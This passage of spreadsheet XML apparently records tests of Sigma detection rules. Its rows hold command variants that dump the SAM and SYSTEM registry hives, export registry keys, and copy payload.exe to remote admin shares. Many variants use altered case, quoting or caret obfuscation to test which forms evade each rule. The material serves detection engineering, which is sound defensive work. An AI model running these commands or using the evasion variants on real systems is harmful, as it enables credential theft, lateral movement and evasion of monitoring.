      </c>
      <c r="I26" s="6" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1)</t>
        </is>
      </c>
      <c r="J26" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K26" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" s="42">
      <c r="A27" s="6" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B27" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_critical_keys</t>
        </is>
      </c>
      <c r="C27" s="6" t="inlineStr">
        <is>
          <t>Exports Critical Registry Keys To a File</t>
        </is>
      </c>
      <c r="D27" s="6" t="inlineStr">
        <is>
          <t>82880171-b475-4201-b811-e9c826cd5eaa</t>
        </is>
      </c>
      <c r="E27" s="6" t="inlineStr">
        <is>
          <t>regedit.exe /"E" C:\temp\sam.reg "HKLM\SAM"</t>
        </is>
      </c>
      <c r="F27" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G27" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H27" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I27" s="6" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1)</t>
        </is>
      </c>
      <c r="J27" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K27" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" s="42">
      <c r="A28" s="6" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B28" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_critical_keys</t>
        </is>
      </c>
      <c r="C28" s="6" t="inlineStr">
        <is>
          <t>Exports Critical Registry Keys To a File</t>
        </is>
      </c>
      <c r="D28" s="6" t="inlineStr">
        <is>
          <t>82880171-b475-4201-b811-e9c826cd5eaa</t>
        </is>
      </c>
      <c r="E28" s="6" t="inlineStr">
        <is>
          <t>regedit.exe -"E" C:\temp\system.reg HKLM\SYSTEM</t>
        </is>
      </c>
      <c r="F28" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G28" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H28" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I28" s="6" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1)</t>
        </is>
      </c>
      <c r="J28" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K28" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" s="42">
      <c r="A29" s="6" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B29" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_critical_keys</t>
        </is>
      </c>
      <c r="C29" s="6" t="inlineStr">
        <is>
          <t>Exports Critical Registry Keys To a File</t>
        </is>
      </c>
      <c r="D29" s="6" t="inlineStr">
        <is>
          <t>82880171-b475-4201-b811-e9c826cd5eaa</t>
        </is>
      </c>
      <c r="E29" s="6" t="inlineStr">
        <is>
          <t>regedit.exe /"E" C:\temp\system.reg HKLM\SYSTEM</t>
        </is>
      </c>
      <c r="F29" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G29" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H29" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I29" s="6" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1)</t>
        </is>
      </c>
      <c r="J29" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K29" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" s="42">
      <c r="A30" s="4" t="n"/>
      <c r="B30" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C30" s="6" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D30" s="6" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E30" s="6" t="inlineStr">
        <is>
          <t>reg.exe export HKCU\Software C:\temp\export.reg</t>
        </is>
      </c>
      <c r="F30" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G30" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H30" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I30" s="4" t="n"/>
      <c r="J30" s="6" t="n">
        <v>1</v>
      </c>
      <c r="K30" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" s="42">
      <c r="A31" s="4" t="n"/>
      <c r="B31" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C31" s="6" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D31" s="6" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E31" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-Item -Path 'HKCU:\Software' | Export-Clixml -Path 'C:\temp\export.xml'"</t>
        </is>
      </c>
      <c r="F31" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G31" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H31" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I31" s="4" t="n"/>
      <c r="J31" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K31" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="32" ht="15.75" customHeight="1" s="42">
      <c r="A32" s="4" t="n"/>
      <c r="B32" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C32" s="6" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D32" s="6" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E32" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMAnd "Get-Item -Path 'HKCU:\Software' | Export-Clixml -Path 'C:\temp\export.xml'"</t>
        </is>
      </c>
      <c r="F32" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G32" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H32" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I32" s="4" t="n"/>
      <c r="J32" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K32" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" s="42">
      <c r="A33" s="4" t="n"/>
      <c r="B33" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C33" s="6" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D33" s="6" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E33" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -ComManD "Get-Item -Path 'HKCU:\Software' | Export-Clixml -Path 'C:\temp\export.xml'"</t>
        </is>
      </c>
      <c r="F33" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G33" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H33" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I33" s="4" t="n"/>
      <c r="J33" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K33" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" s="42">
      <c r="A34" s="4" t="n"/>
      <c r="B34" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C34" s="6" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D34" s="6" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E34" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMAnd "Get-Item -Path 'HKCU:\Software' | Export-Clixml -Path 'C:\temp\export.xml'"</t>
        </is>
      </c>
      <c r="F34" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G34" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H34" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I34" s="4" t="n"/>
      <c r="J34" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K34" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="35" ht="15.75" customHeight="1" s="42">
      <c r="A35" s="4" t="n"/>
      <c r="B35" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C35" s="6" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D35" s="6" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E35" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -coMMANd "Get-Item -Path 'HKCU:\Software' | Export-Clixml -Path 'C:\temp\export.xml'"</t>
        </is>
      </c>
      <c r="F35" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G35" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H35" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I35" s="4" t="n"/>
      <c r="J35" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K35" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="36" ht="15.75" customHeight="1" s="42">
      <c r="A36" s="4" t="n"/>
      <c r="B36" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C36" s="6" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D36" s="6" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E36" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -ComMaNd "Get-Item -Path 'HKCU:\Software' | Export-Clixml -Path 'C:\temp\export.xml'"</t>
        </is>
      </c>
      <c r="F36" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G36" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H36" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I36" s="4" t="n"/>
      <c r="J36" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K36" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="37" ht="15.75" customHeight="1" s="42">
      <c r="A37" s="4" t="n"/>
      <c r="B37" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C37" s="6" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D37" s="6" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E37" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-Item -Path 'HKCU:\Software' | Export-Clixml -Path 'C:\temp\export.xml'"</t>
        </is>
      </c>
      <c r="F37" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G37" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H37" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I37" s="4" t="n"/>
      <c r="J37" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K37" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" s="42">
      <c r="A38" s="4" t="n"/>
      <c r="B38" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C38" s="6" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D38" s="6" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E38" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -COMMAnD "Get-Item -Path 'HKCU:\Software' | Export-Clixml -Path 'C:\temp\export.xml'"</t>
        </is>
      </c>
      <c r="F38" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G38" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H38" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I38" s="4" t="n"/>
      <c r="J38" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K38" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" s="42">
      <c r="A39" s="4" t="n"/>
      <c r="B39" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C39" s="6" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D39" s="6" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E39" s="6" t="inlineStr">
        <is>
          <t>regedit.exe /e"C:\temp\export.reg" "HKEY_CURRENT_USER\Software"</t>
        </is>
      </c>
      <c r="F39" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G39" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H39" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I39" s="6" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1)</t>
        </is>
      </c>
      <c r="J39" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K39" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" s="42">
      <c r="A40" s="4" t="n"/>
      <c r="B40" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C40" s="6" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D40" s="6" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E40" s="6" t="inlineStr">
        <is>
          <t>regedit.exe /"e"C:\temp\export.reg"" "HKEY_CURRENT_USER\Software"</t>
        </is>
      </c>
      <c r="F40" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G40" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H40" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I40" s="6" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1)</t>
        </is>
      </c>
      <c r="J40" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K40" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" s="42">
      <c r="A41" s="4" t="n"/>
      <c r="B41" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C41" s="6" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D41" s="6" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E41" s="6" t="inlineStr">
        <is>
          <t>regedit.exe -"e"C:\temp\export.reg"" "HKEY_CURRENT_USER\Software"</t>
        </is>
      </c>
      <c r="F41" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G41" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H41" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I41" s="6" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1)</t>
        </is>
      </c>
      <c r="J41" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K41" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" s="42">
      <c r="A42" s="6" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B42" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C42" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D42" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E42" s="6" t="inlineStr">
        <is>
          <t>cmd.exe /"c" \"type C:\\temp\\payload.exe &gt; \\\\10.0.0.2\\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F42" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G42" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H42" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I42" s="6" t="inlineStr">
        <is>
          <t>Potential Download/Upload Activity Using Type Command (aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f); Potential Download/Upload Activity Using Type Command (aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f)</t>
        </is>
      </c>
      <c r="J42" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K42" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" s="42">
      <c r="A43" s="6" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B43" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C43" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D43" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E43" s="6" t="inlineStr">
        <is>
          <t>cmd.exe -"c" \"type C:\\temp\\payload.exe &gt; \\\\10.0.0.2\\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F43" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G43" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H43" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I43" s="6" t="inlineStr">
        <is>
          <t>Potential Download/Upload Activity Using Type Command (aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f); Potential Download/Upload Activity Using Type Command (aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f)</t>
        </is>
      </c>
      <c r="J43" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K43" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="44" ht="15.75" customHeight="1" s="42">
      <c r="A44" s="6" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B44" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C44" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D44" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E44" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F44" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G44" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H44" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I44" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J44" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K44" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" s="42">
      <c r="A45" s="6" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B45" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C45" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D45" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E45" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -c "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F45" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G45" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H45" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I45" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J45" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K45" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" s="42">
      <c r="A46" s="6" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B46" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C46" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D46" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E46" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -ComMaNd "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F46" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G46" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H46" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I46" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J46" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K46" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" s="42">
      <c r="A47" s="6" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B47" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C47" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D47" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E47" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -comManD "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F47" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G47" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H47" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I47" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J47" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K47" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" s="42">
      <c r="A48" s="6" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B48" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C48" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D48" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E48" s="6" t="inlineStr">
        <is>
          <t>cmd.exe /C c^o^p^y C:\temp\file.txt \\192.168.1.10\C$\Windows\Temp\file.txt</t>
        </is>
      </c>
      <c r="F48" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G48" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H48" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I48" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J48" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K48" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" s="42">
      <c r="A49" s="6" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B49" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C49" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D49" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E49" s="6" t="inlineStr">
        <is>
          <t>cmd.exe /"c" c^o^p^y C:\temp\file.txt \\192.168.1.10\C$\Windows\Temp\file.txt</t>
        </is>
      </c>
      <c r="F49" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G49" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H49" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I49" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J49" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K49" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" s="42">
      <c r="A50" s="6" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B50" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C50" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D50" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E50" s="6" t="inlineStr">
        <is>
          <t>cmd.exe -"c" c^o^p^y C:\temp\file.txt \\192.168.1.10\C$\Windows\Temp\file.txt</t>
        </is>
      </c>
      <c r="F50" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G50" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H50" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I50" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J50" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K50" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" s="42">
      <c r="A51" s="6" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B51" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C51" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D51" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E51" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -Command "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F51" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G51" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H51" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I51" s="6" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J51" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K51" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" s="42">
      <c r="A52" s="6" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B52" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C52" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D52" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E52" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -c "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F52" s="6" t="b">
